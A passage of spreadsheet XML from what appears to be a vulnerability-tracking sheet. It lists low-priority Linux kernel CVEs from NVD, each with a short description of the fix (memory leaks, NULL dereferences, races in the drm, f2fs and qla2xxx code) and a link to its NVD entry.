    </row>
    <row r="1547">
      <c r="A1547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89816</t>
        </is>
      </c>
      <c r="D1547" s="5" t="inlineStr"/>
      <c r="E1547" s="5" t="inlineStr"/>
      <c r="F1547" s="5" t="inlineStr"/>
      <c r="G1547" s="5" t="inlineStr"/>
      <c r="H1547" s="5" t="inlineStr"/>
      <c r="I1547" s="5" t="inlineStr"/>
      <c r="J1547" s="5" t="inlineStr"/>
      <c r="K1547" s="5" t="inlineStr"/>
      <c r="L1547" s="5" t="inlineStr"/>
      <c r="M1547" s="5" t="inlineStr"/>
      <c r="N1547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1547" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1547" s="5" t="inlineStr"/>
      <c r="Q1547" s="5" t="inlineStr"/>
      <c r="R1547" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm: Fix drm_crtc_commit leak if signaled when PAGE_FLIP_EVENT is used
Commit 1c6ceeee6ebb ("drm/atomic: Fix memleak on ERESTARTSYS during
non-blocking commits") fixed a very similar issue when the event was
allocated by drm_atomic_helper_setup_commit() itself.
However, if the event is allocated in prepare_signaling(), it will also be
set to NULL in complete_signaling(), which prevents drm_crtc_commit from
being put in __drm_atomic_helper_crtc_destroy_state().
Dropping the reference when the event is set to NULL at
complete_signaling() fixes the leak.
The leak can be reproduced by sending a signal to the thread using
DRM_MODE_PAGE_FLIP_EVENT and using a sw_sync fence to cause the atomic
ioctl to block at drm_atomic_helper_wait_for_fences(). It happened both
with amdgpu and vkms.</t>
        </is>
      </c>
      <c r="S1547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89816</t>
        </is>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89817</t>
        </is>
      </c>
      <c r="D1548" s="5" t="inlineStr"/>
      <c r="E1548" s="5" t="inlineStr"/>
      <c r="F1548" s="5" t="inlineStr"/>
      <c r="G1548" s="5" t="inlineStr"/>
      <c r="H1548" s="5" t="inlineStr"/>
      <c r="I1548" s="5" t="inlineStr"/>
      <c r="J1548" s="5" t="inlineStr"/>
      <c r="K1548" s="5" t="inlineStr"/>
      <c r="L1548" s="5" t="inlineStr"/>
      <c r="M1548" s="5" t="inlineStr"/>
      <c r="N1548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1548" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1548" s="5" t="inlineStr"/>
      <c r="Q1548" s="5" t="inlineStr"/>
      <c r="R1548" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/gud: NUL-terminate TV mode names read from the device
gud_connector_add_tv_mode() reads a buffer of fixed-size mode names from
the USB device and passes pointers into it to
drm_mode_create_tv_properties_legacy(), which calls strlen() on each one.
Nothing guarantees the device NUL-terminates a name, so strlen() can run
past the end of a slot and, for the last mode, past the end of the
allocation.
Terminate each name at the end of its slot before use.</t>
        </is>
      </c>
      <c r="S1548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89817</t>
        </is>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89820</t>
        </is>
      </c>
      <c r="D1549" s="5" t="inlineStr"/>
      <c r="E1549" s="5" t="inlineStr"/>
      <c r="F1549" s="5" t="inlineStr"/>
      <c r="G1549" s="5" t="inlineStr"/>
      <c r="H1549" s="5" t="inlineStr"/>
      <c r="I1549" s="5" t="inlineStr"/>
      <c r="J1549" s="5" t="inlineStr"/>
      <c r="K1549" s="5" t="inlineStr"/>
      <c r="L1549" s="5" t="inlineStr"/>
      <c r="M1549" s="5" t="inlineStr"/>
      <c r="N1549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1549" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1549" s="5" t="inlineStr"/>
      <c r="Q1549" s="5" t="inlineStr"/>
      <c r="R1549" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: fix dc_lock leak on GPU reset error paths
On GPU reset, dm_suspend() takes dc_lock and leaves it for dm_resume()
to drop. If amdgpu_dm_commit_zero_streams() or dm_dmub_hw_init() fails,
the function returns with the lock still held. The matching resume path
is then skipped, so every later dc_lock take hangs.
Release the cached DC state and unlock before returning the error.</t>
        </is>
      </c>
      <c r="S1549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89820</t>
        </is>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89821</t>
        </is>
      </c>
      <c r="D1550" s="5" t="inlineStr"/>
      <c r="E1550" s="5" t="inlineStr"/>
      <c r="F1550" s="5" t="inlineStr"/>
      <c r="G1550" s="5" t="inlineStr"/>
      <c r="H1550" s="5" t="inlineStr"/>
      <c r="I1550" s="5" t="inlineStr"/>
      <c r="J1550" s="5" t="inlineStr"/>
      <c r="K1550" s="5" t="inlineStr"/>
      <c r="L1550" s="5" t="inlineStr"/>
      <c r="M1550" s="5" t="inlineStr"/>
      <c r="N1550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1550" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1550" s="5" t="inlineStr"/>
      <c r="Q1550" s="5" t="inlineStr"/>
      <c r="R1550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: avoid divide-by-zero in __is_lut_linear()
__is_lut_linear() computes the expected value of each entry with
	expected = i * MAX_DRM_LUT_VALUE / (size - 1);
If it is ever called with a single-entry LUT, size - 1 is zero and the
kernel takes a divide error (#DE). A LUT with fewer than two entries
cannot describe a linear mapping anyway, so return false early instead
of dividing by zero.</t>
        </is>
      </c>
      <c r="S1550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89821</t>
        </is>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89822</t>
        </is>
      </c>
      <c r="D1551" s="5" t="inlineStr"/>
      <c r="E1551" s="5" t="inlineStr"/>
      <c r="F1551" s="5" t="inlineStr"/>
      <c r="G1551" s="5" t="inlineStr"/>
      <c r="H1551" s="5" t="inlineStr"/>
      <c r="I1551" s="5" t="inlineStr"/>
      <c r="J1551" s="5" t="inlineStr"/>
      <c r="K1551" s="5" t="inlineStr"/>
      <c r="L1551" s="5" t="inlineStr"/>
      <c r="M1551" s="5" t="inlineStr"/>
      <c r="N1551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1551" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1551" s="5" t="inlineStr"/>
      <c r="Q1551" s="5" t="inlineStr"/>
      <c r="R1551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/i915: Guard against NULL driver_data in i915_pci_probe()
pci_match_device() can return the dummy pci_device_id_any entry
when a device is force-bound via sysfs driver_override, in which
case -&gt;driver_data is unset (NULL). i915_pci_probe() casts it to
struct intel_device_info * unconditionally and dereferences
intel_info-&gt;require_force_probe, causing a NULL-ptr-deref.
(cherry picked from commit 2727922084672cc274ecea726ea00363c2893731)</t>
        </is>
      </c>
      <c r="S1551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89822</t>
        </is>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89824</t>
        </is>
      </c>
      <c r="D1552" s="5" t="inlineStr"/>
      <c r="E1552" s="5" t="inlineStr"/>
      <c r="F1552" s="5" t="inlineStr"/>
      <c r="G1552" s="5" t="inlineStr"/>
      <c r="H1552" s="5" t="inlineStr"/>
      <c r="I1552" s="5" t="inlineStr"/>
      <c r="J1552" s="5" t="inlineStr"/>
      <c r="K1552" s="5" t="inlineStr"/>
      <c r="L1552" s="5" t="inlineStr"/>
      <c r="M1552" s="5" t="inlineStr"/>
      <c r="N1552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1552" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1552" s="5" t="inlineStr"/>
      <c r="Q1552" s="5" t="inlineStr"/>
      <c r="R1552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panel-edp: fix i2c adapter leak on probe failure
Make sure to drop the i2c adapter reference on probe failure (e.g.
probe deferral) and on driver unbind also if a devicetree redundantly
uses the 'ddc-i2c-bus' property to point to the aux ddc bus.</t>
        </is>
      </c>
      <c r="S1552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89824</t>
        </is>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89827</t>
        </is>
      </c>
      <c r="D1553" s="5" t="inlineStr"/>
      <c r="E1553" s="5" t="inlineStr"/>
      <c r="F1553" s="5" t="inlineStr"/>
      <c r="G1553" s="5" t="inlineStr"/>
      <c r="H1553" s="5" t="inlineStr"/>
      <c r="I1553" s="5" t="inlineStr"/>
      <c r="J1553" s="5" t="inlineStr"/>
      <c r="K1553" s="5" t="inlineStr"/>
      <c r="L1553" s="5" t="inlineStr"/>
      <c r="M1553" s="5" t="inlineStr"/>
      <c r="N1553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1553" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1553" s="5" t="inlineStr"/>
      <c r="Q1553" s="5" t="inlineStr"/>
      <c r="R1553" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: avoid force-completing uninitialized UVD rings
uvd_v7_0_sw_init() does not initialize the UVD decode ring for an
SR-IOV VF. However, amdgpu_uvd_resume() unconditionally force-completes
the decode ring when restoring its fence sequence.
Skip fence completion when the fence driver is not initialized.</t>
        </is>
      </c>
      <c r="S1553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89827</t>
        </is>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89828</t>
        </is>
      </c>
      <c r="D1554" s="5" t="inlineStr"/>
      <c r="E1554" s="5" t="inlineStr"/>
      <c r="F1554" s="5" t="inlineStr"/>
      <c r="G1554" s="5" t="inlineStr"/>
      <c r="H1554" s="5" t="inlineStr"/>
      <c r="I1554" s="5" t="inlineStr"/>
      <c r="J1554" s="5" t="inlineStr"/>
      <c r="K1554" s="5" t="inlineStr"/>
      <c r="L1554" s="5" t="inlineStr"/>
      <c r="M1554" s="5" t="inlineStr"/>
      <c r="N1554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1554" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1554" s="5" t="inlineStr"/>
      <c r="Q1554" s="5" t="inlineStr"/>
      <c r="R1554" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix init ordering in amdgpu_vram_mgr_init()
drmm_cgroup_register_region() is called before INIT_LIST_HEAD() and
gpu_buddy_init() in amdgpu_vram_mgr_init(). If it fails, the function
returns early and bypasses those initializations.
Since adev-&gt;mman.initialized is set to true before amdgpu_vram_mgr_init()
is called, a failure triggers amdgpu_ttm_fini(), which calls
amdgpu_vram_mgr_fini(), which then:
 - Calls list_for_each_entry_safe() on reservations_pending and
   reserved_pages, whose list_head::next pointers are zero-initialized
   (NULL). The loop does not recognize them as empty and dereferences NULL.
 - Calls gpu_buddy_fini(), which iterates free_trees[] unconditionally
   via for_each_free_tree(). Since mm-&gt;free_trees is NULL
   (never allocated), this dereferences NULL.
Both result in a kernel panic on the module load error path.
Fix by moving drmm_cgroup_register_region() to after the list and buddy
allocator are fully initialized, so the teardown path is safe to run.</t>
        </is>
      </c>
      <c r="S1554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89828</t>
        </is>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89830</t>
        </is>
      </c>
      <c r="D1555" s="5" t="inlineStr"/>
      <c r="E1555" s="5" t="inlineStr"/>
      <c r="F1555" s="5" t="inlineStr"/>
      <c r="G1555" s="5" t="inlineStr"/>
      <c r="H1555" s="5" t="inlineStr"/>
      <c r="I1555" s="5" t="inlineStr"/>
      <c r="J1555" s="5" t="inlineStr"/>
      <c r="K1555" s="5" t="inlineStr"/>
      <c r="L1555" s="5" t="inlineStr"/>
      <c r="M1555" s="5" t="inlineStr"/>
      <c r="N1555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1555" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1555" s="5" t="inlineStr"/>
      <c r="Q1555" s="5" t="inlineStr"/>
      <c r="R1555" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix valid block count leak on data block allocation failure
In __allocate_data_block(), when allocating a new data block
(dn-&gt;data_blkaddr == NULL_ADDR), inc_valid_block_count() is
called first to increment total_valid_block_count and i_blocks.
If the subsequent f2fs_allocate_data_block() fails, the function
returns the error directly without rolling back the
already-incremented block counts, causing a permanent leak.
Fix this by calling dec_valid_block_count() to undo the
increment before returning the error. The condition
old_blkaddr == NULL_ADDR precisely identifies the case where
inc_valid_block_count() was called.</t>
        </is>
      </c>
      <c r="S1555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89830</t>
        </is>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89831</t>
        </is>
      </c>
      <c r="D1556" s="5" t="inlineStr"/>
      <c r="E1556" s="5" t="inlineStr"/>
      <c r="F1556" s="5" t="inlineStr"/>
      <c r="G1556" s="5" t="inlineStr"/>
      <c r="H1556" s="5" t="inlineStr"/>
      <c r="I1556" s="5" t="inlineStr"/>
      <c r="J1556" s="5" t="inlineStr"/>
      <c r="K1556" s="5" t="inlineStr"/>
      <c r="L1556" s="5" t="inlineStr"/>
      <c r="M1556" s="5" t="inlineStr"/>
      <c r="N1556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1556" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1556" s="5" t="inlineStr"/>
      <c r="Q1556" s="5" t="inlineStr"/>
      <c r="R1556" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: protect critical_task_priority updates with s_umount
The sysfs store path already takes s_umount for GC thread control
entries, and ckpt_thread_ioprio is covered as well.
critical_task_priority also updates checkpoint or GC kthread scheduling
state, but it is not covered by that serialization. It can race with
remount or teardown paths that are stopping those threads.
Protect critical_task_priority sysfs writes with s_umount too.</t>
        </is>
      </c>
      <c r="S1556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89831</t>
        </is>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89833</t>
        </is>
      </c>
      <c r="D1557" s="5" t="inlineStr"/>
      <c r="E1557" s="5" t="inlineStr"/>
      <c r="F1557" s="5" t="inlineStr"/>
      <c r="G1557" s="5" t="inlineStr"/>
      <c r="H1557" s="5" t="inlineStr"/>
      <c r="I1557" s="5" t="inlineStr"/>
      <c r="J1557" s="5" t="inlineStr"/>
      <c r="K1557" s="5" t="inlineStr"/>
      <c r="L1557" s="5" t="inlineStr"/>
      <c r="M1557" s="5" t="inlineStr"/>
      <c r="N1557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1557" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1557" s="5" t="inlineStr"/>
      <c r="Q1557" s="5" t="inlineStr"/>
      <c r="R1557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid potential deadloop in f2fs_fsync_node_pages()
There is potential deadloop in race condition:
Thread A				Thread B
- fsync
 - f2fs_do_sync_file
  - f2fs_fsync_node_pages
   - last_fsync_dnode
    - folio_get(last_folio)
					- f2fs_setattr
					 - f2fs_truncate
					  - f2fs_truncate_blocks
					   - f2fs_do_truncate_blocks
					    - f2fs_truncate_inode_blocks
					     - truncate_dnode
					      - truncate_node
					       - invalidate_mapping_pages
					        - folio-&gt;mapping = NULL
   - is_node_folio alwasy return false
   - atomic &amp;&amp; !marked is always true,
     then goto retry</t>
        </is>
      </c>
      <c r="S1557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89833</t>
        </is>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89834</t>
        </is>
      </c>
      <c r="D1558" s="5" t="inlineStr"/>
      <c r="E1558" s="5" t="inlineStr"/>
      <c r="F1558" s="5" t="inlineStr"/>
      <c r="G1558" s="5" t="inlineStr"/>
      <c r="H1558" s="5" t="inlineStr"/>
      <c r="I1558" s="5" t="inlineStr"/>
      <c r="J1558" s="5" t="inlineStr"/>
      <c r="K1558" s="5" t="inlineStr"/>
      <c r="L1558" s="5" t="inlineStr"/>
      <c r="M1558" s="5" t="inlineStr"/>
      <c r="N1558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1558" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1558" s="5" t="inlineStr"/>
      <c r="Q1558" s="5" t="inlineStr"/>
      <c r="R1558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to migrate all curseg types during free_segment_range
In free_segment_range(), the curseg evacuation loop only iterates up to
NR_CURSEG_PERSIST_TYPE (0..5), missing non-persistent in-memory curseg
types such as CURSEG_COLD_DATA_PINNED and CURSEG_ALL_DATA_ATGC.
Even though these in-memory curseg types are not saved in the on-disk
checkpoint header, they still occupy active physical segments at runtime.
If an active in-memory curseg happens to be allocated within the segment
range being truncated during filesystem shrink, failing to evacuate it
will cause subsequent writes to the curseg attempting out-of-bounds I/O
on the truncated storage range.
Fix this by expanding the curseg evacuation loop upper bound to
NR_CURSEG_TYPE to ensure all active curseg types are safely migrated
out of the target range.</t>
        </is>
      </c>
      <c r="S1558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89834</t>
        </is>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89835</t>
        </is>
      </c>
      <c r="D1559" s="5" t="inlineStr"/>
      <c r="E1559" s="5" t="inlineStr"/>
      <c r="F1559" s="5" t="inlineStr"/>
      <c r="G1559" s="5" t="inlineStr"/>
      <c r="H1559" s="5" t="inlineStr"/>
      <c r="I1559" s="5" t="inlineStr"/>
      <c r="J1559" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1559" s="5" t="inlineStr"/>
      <c r="L1559" s="5" t="inlineStr"/>
      <c r="M1559" s="5" t="inlineStr"/>
      <c r="N1559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1559" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1559" s="5" t="inlineStr"/>
      <c r="Q1559" s="5" t="inlineStr"/>
      <c r="R1559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: avoid NULL checkpoint thread access in sysfs
checkpoint_merge can be enabled even when no checkpoint merge thread is
running. A read-only mount is one case: f2fs does not start
f2fs_issue_ckpt there, but ckpt_thread_ioprio is still writable through
sysfs.
The ckpt_thread_ioprio store path updates the saved ioprio value and,
when checkpoint_merge is enabled, calls set_task_ioprio() for the
checkpoint thread. If cprc-&gt;f2fs_issue_ckpt is NULL, that dereferences a
NULL task pointer.
Protect ckpt_thread_ioprio sysfs writes with s_umount as well, so the
checkpoint thread cannot disappear under the store path while updating
its ioprio.</t>
        </is>
      </c>
      <c r="S1559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89835</t>
        </is>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89837</t>
        </is>
      </c>
      <c r="D1560" s="5" t="inlineStr"/>
      <c r="E1560" s="5" t="inlineStr"/>
      <c r="F1560" s="5" t="inlineStr"/>
      <c r="G1560" s="5" t="inlineStr"/>
      <c r="H1560" s="5" t="inlineStr"/>
      <c r="I1560" s="5" t="inlineStr"/>
      <c r="J1560" s="5" t="inlineStr"/>
      <c r="K1560" s="5" t="inlineStr"/>
      <c r="L1560" s="5" t="inlineStr"/>
      <c r="M1560" s="5" t="inlineStr"/>
      <c r="N1560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1560" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1560" s="5" t="inlineStr"/>
      <c r="Q1560" s="5" t="inlineStr"/>
      <c r="R1560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix dentry folio leak in find_in_level
find_in_level() gets a dentry folio with f2fs_find_data_folio() before
calling find_in_block().  If find_in_block() returns an error, the
function stores the error in res_folio and breaks out of the loop without
dropping the dentry folio.
This leaks the folio reference on the find_in_block() error path.  Drop
the dentry folio before returning the error to the caller.</t>
        </is>
      </c>
      <c r="S1560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89837</t>
        </is>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89839</t>
        </is>
      </c>
      <c r="D1561" s="5" t="inlineStr"/>
      <c r="E1561" s="5" t="inlineStr"/>
      <c r="F1561" s="5" t="inlineStr"/>
      <c r="G1561" s="5" t="inlineStr"/>
      <c r="H1561" s="5" t="inlineStr"/>
      <c r="I1561" s="5" t="inlineStr"/>
      <c r="J1561" s="5" t="inlineStr"/>
      <c r="K1561" s="5" t="inlineStr"/>
      <c r="L1561" s="5" t="inlineStr"/>
      <c r="M1561" s="5" t="inlineStr"/>
      <c r="N1561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1561" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1561" s="5" t="inlineStr"/>
      <c r="Q1561" s="5" t="inlineStr"/>
      <c r="R1561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: use the mount idmap for the owner check in f2fs_xattr_advise_set()
f2fs_xattr_advise_set() calls inode_owner_or_capable() with &amp;nop_mnt_idmap
before allowing the "system.advise" xattr to be set, instead of the idmap
that the VFS passes to the -&gt;set() handler.
f2fs supports idmapped mounts, so on such a mount this checks the caller's
fsuid against the unmapped on-disk owner rather than the mapped owner: the
actual owner can be wrongly denied with -EPERM and an unrelated caller
wrongly allowed.  Pass the handler's idmap instead.</t>
        </is>
      </c>
      <c r="S1561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89839</t>
        </is>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89842</t>
        </is>
      </c>
      <c r="D1562" s="5" t="inlineStr"/>
      <c r="E1562" s="5" t="inlineStr"/>
      <c r="F1562" s="5" t="inlineStr"/>
      <c r="G1562" s="5" t="inlineStr"/>
      <c r="H1562" s="5" t="inlineStr"/>
      <c r="I1562" s="5" t="inlineStr"/>
      <c r="J1562" s="5" t="inlineStr"/>
      <c r="K1562" s="5" t="inlineStr"/>
      <c r="L1562" s="5" t="inlineStr"/>
      <c r="M1562" s="5" t="inlineStr"/>
      <c r="N1562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1562" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1562" s="5" t="inlineStr"/>
      <c r="Q1562" s="5" t="inlineStr"/>
      <c r="R1562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Skip NVMe LS reject IOCB when FW not started
qla_nvme_xmt_ls_rsp() bails out to the out: label when firmware is not
started (!ha-&gt;flags.fw_started), but the out: path unconditionally calls
qla_nvme_ls_reject_iocb(), which ends in qla2x00_start_iocbs() and an
unconditional doorbell write to the request queue in-pointer register.
This rings the firmware doorbell and queues an IOCB that stopped or
resetting firmware cannot consume, and touches MMIO during the reset/EEH
window where fw_started is also clear.
Only emit the LS reject IOCB (and ring the doorbell) when fw_started is
set; otherwise just clean up and return. The post-allocation failure
cases (SRB alloc / qla2x00_start_sp() failure) run with firmware started
and still send the reject. Apply the same guard to the reject emission
in qla2xxx_process_purls_pkt().</t>
        </is>
      </c>
      <c r="S1562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89842</t>
        </is>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
